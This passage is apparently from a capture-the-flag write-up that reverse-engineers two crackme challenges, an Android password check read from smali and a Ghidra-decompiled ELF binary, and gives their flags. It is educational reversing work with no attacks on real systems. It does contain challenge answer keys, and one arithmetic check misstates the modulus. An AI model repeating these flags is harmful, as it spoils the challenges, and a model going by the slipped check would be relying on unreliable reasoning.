    iget-object v0, p0, Lctf/interiut/password_check/MainActivity;->button:Landroid/widget/Button;

    new-instance v1, Lctf/interiut/password_check/MainActivity$1;

    invoke-direct {v1, p0}, Lctf/interiut/password_check/MainActivity$1;-><init>(Lctf/interiut/password_check/MainActivity;)V

    invoke-virtual {v0, v1}, Landroid/widget/Button;->setOnClickListener(Landroid/view/View$OnClickListener;)V

    .line 48
    return-void
.end method
```

I do it line by line thanks to this website http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html

```
public checkPassword(String password) {
    v0 = 17
    v1 = password.substring(v0);
    
    v2 = 0

    v3 = new String()
    v4 = Base64.getDecoder()
    v4 = Base64Decoder.decode(v1)

    v3 = new String(v4)
    v4 = 7
    v5 = v3.substring(v2, v4)

    v6 = new String()
    v7 = Base64.getDecoder()
    v8 = "RU5TSUJTew==" // ENSIBS{
    v7 = Base64Decoder.decode(v8)
    v6 = v7
    if (v5.equals(v6)) { // ENSIBS{
        v5 = 8
        v4 = v3.substring(v4, v5)   // 7 to 8
        v6 = 9
        v7 = 10
        v6 = password.substring(v6, v7) // 9 to 10
        if (v4.equals(v6))  {       // password[7] == password[9]
            v4 = 14
            v6 = v3.substring(v5, v4) // 8 to 14
            v8 = new String()
            v9 = Base64.getDecoder()
            v10 = "bTRsaV8x" // m4li_1
            v9 = Base64Decoder.decode(v10)
            v8 = v9
            if (v6.equals(v8)) { // m4li_1
                v6 = 15
                v4 = v3.substring(v4, v6) // 14, 15
                v8 = 11
                v8 = password.substring(v7, v8) // 10, 11
                if (v4.equals(v8)) { // password[14] == password[10]
                    v4 = v3.substring(v6, v0) // 15, 17
                    v6 = "_3"
                    if (v4.equals(v6)) { //password[15:17] == "_3"
                        v4 = 19
                        v0 = v3.substring(v0, v4) // 17, 19
                        v5 = password.substring(v5, v7) // 8, 10
                        if (v0.equals(v5)) { password[17:19] == password[8:10]
                            v0 = 21
                            v0 = v3.substring(v4, v0) // 19, 21
                            v4 = "Y}"
                            if (v0.equals(v4)) { // password[19:21] == "Y}"

                            }
                        }
                    }
                }
            }
        } 
    }
}
```

The flag was supposed to be ENSIBS{4m4li_1l_3m4Y}
but I discuted with the creator of the challenge and the flag was ENSIBS{sm4li_1s_3asY}
(problem during the creation of the challenge)

### Bithagore

```
$ file bithagore 
bithagore: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bca6f2fa1ddcb0503f230aa80864d7bea6db79f9, not stripped
```

The decompiled code created by ghidra was :

```c
undefined4 __regparm2
main(undefined4 param_1,undefined4 param_2,int param_1_00,undefined4 *param_2_00)

{
  char char12;
  char char19;
  byte char4;
  byte char11;
  byte char16;
  char *input;
  uint uVar1;
  uint uVar2;
  int in_GS_OFFSET;
  undefined8 uVar3;
  undefined4 uStack84;
  undefined4 uStack80;
  undefined auStack76 [10];
  char char7;
  char char14;
  uint intChar16;
  uint local_3c;
  uint local_38;
  char char17;
  byte char8;
  byte char20;
  char char23;
  int local_24;
  undefined4 *local_18;
  
  local_18 = &param_1_00;
  local_24 = *(int *)(in_GS_OFFSET + 0x14);
  if (param_1_00 < 2) {
    uStack84 = param_2;
    __printf_chk(1,"%s <flag>\n",*param_2_00);
  }
  else {
    input = (char *)param_2_00[1];
    char12 = input[0xc];
    if ((-1 < char12) && (input[10] == 'g')) {
      char23 = input[0x17];
      uVar2 = SEXT14(char23);
      char19 = input[0x13];
      if (((int)char19 + uVar2 == 0xf4) && (input[2] == 'G')) {
        char20 = input[0x14];
        char4 = input[0x15];
        uVar1 = local_38 & 0xffffff00;
        local_38 = uVar1 | input[0x15];
        if (((((input[0x14] ^ 0x42) == input[0x15]) && (input[0xf] == 't')) && (char19 >> 5 == '\x03')) &&
           ((char19 == 'w' && ((char)input[0x15] >> 3 == '\x0e')))) {
          char11 = input[0xb];
          local_3c = local_3c & 0xffffff00 | (uint)char11;
          if (((char)char11 >> 1 == '\x18') && (input[1] == '2')) {
            char17 = input[0x11];
            char8 = input[8];
            intChar16 = SEXT14(char17);
            if ((((int)intChar16 >> ((char)char8 % '\b' & 0x1fU) == 0x33) && (char17 == '3')) &&
               ((input[6] == '1' &&
                ((((char20 == 0x31 && (input[5] == 'b')) && (char20 = input[0xd], char20 == 0x33))
                 && ((char4 == 0x73 && ((uVar2 & 0x3ffffff) == 0x7d)))))))) {
              char4 = input[4];
              local_38 = uVar1 | char4;
              if (((int)char12 >> ((char)char4 % '\b' & 0x1fU) == 0xe) &&
                 ((char8 == 0x68 && char12 == 'r' &&
                  (char17 = *input, ((short)char17 % 8 & 0xffU) == 0)))) {
                char16 = input[0x10];
                char14 = input[0xe];
                intChar16 = (uint)char16;
                if ((((int)(char)char16 << (char14 % '\b' & 0x1fU) == 0x3400) &&
                    (((input[9] == '4' && (char8 = input[0x12], (char)char8 % '\b' == '\a')) &&
                     (input[3] == '2')))) && (char4 == 0x7b)) {
                  local_3c = SEXT14((char)char11);
                  char7 = input[7];
                  uVar1 = SEXT14(char7);
                  if ((((((local_3c + uVar1 == 0xa4) && (char23 % '\b' == '\x05')) &&
                        ((char16 == 0x68 &&
                         (((uVar1 & 0x7fffffff) == 0x74 && (0x77 >> (char7 % '\b' & 0x1fU) == 7)))))
                        ) && (input[0x16] == '3')) &&
                      (((char14 == '_' && (char17 == 'H')) && ((char8 & 0x80) == 0)))) &&
                     (((uVar2 == 0x7d && (local_3c == 0x30)) &&
                      ((char8 == 0x5f && ((uVar1 & 0x1ffffff) == 0x74)))))) {
                    puts("Bien joué, tu peux soumettre ce flag !");
                    goto LAB_080490c8;
                  }
                }
              }
            }
          }
        }
      }
    }
    puts("C\'est loupé !");
  }
LAB_080490c8:
  if (local_24 != *(int *)(in_GS_OFFSET + 0x14)) {
    uStack84 = 0x80493bd;
    uVar3 = __stack_chk_fail_local();
    uStack84 = (undefined4)uVar3;
    __libc_start_main(main,uStack80,auStack76,__libc_csu_init,__libc_csu_fini,
                      (int)((ulonglong)uVar3 >> 0x20),&uStack84);
    do {
                    /* WARNING: Do nothing block with infinite loop */
    } while( true );
  }
  return 0;
}
```

I was thinking to use a tool like z3 but I didn't need it.

I start with easy thing like : input[2] == 'G' or char8 == 0x5f

```python
>>> chr(0x5f)
'_'
```

And finally things like this (((int)(char)char16 << (char14 % '\b' & 0x1fU) == 0x3400)

```python
>>> ord('h') << (ord('_') % 0xb & 0x1f)
13312
>>> 0x3400
13312
```

```
input[0] = 'H'
input[1] = '2'
input[2] = 'G'
input[3] = '2'
input[4] = '{'

input[5] = 'b'
input[6] = '1'
input[7] = 't'
input[8] = 'h'
input[9] = '4'
input[10] = 'g'
input[11] = '0'
input[12] = 'r'
input[13] = '3'
input[14] = '_'
input[15] = 't'
input[16] = 'h'
input[17] = '3'
input[18] = '_'
input[19] = 'w'
input[20] = '1'
input[21] = 's'
input[22] = '3'
input[23] = '}'

H2G2{b1th4g0r3_th3_w1s3}
```
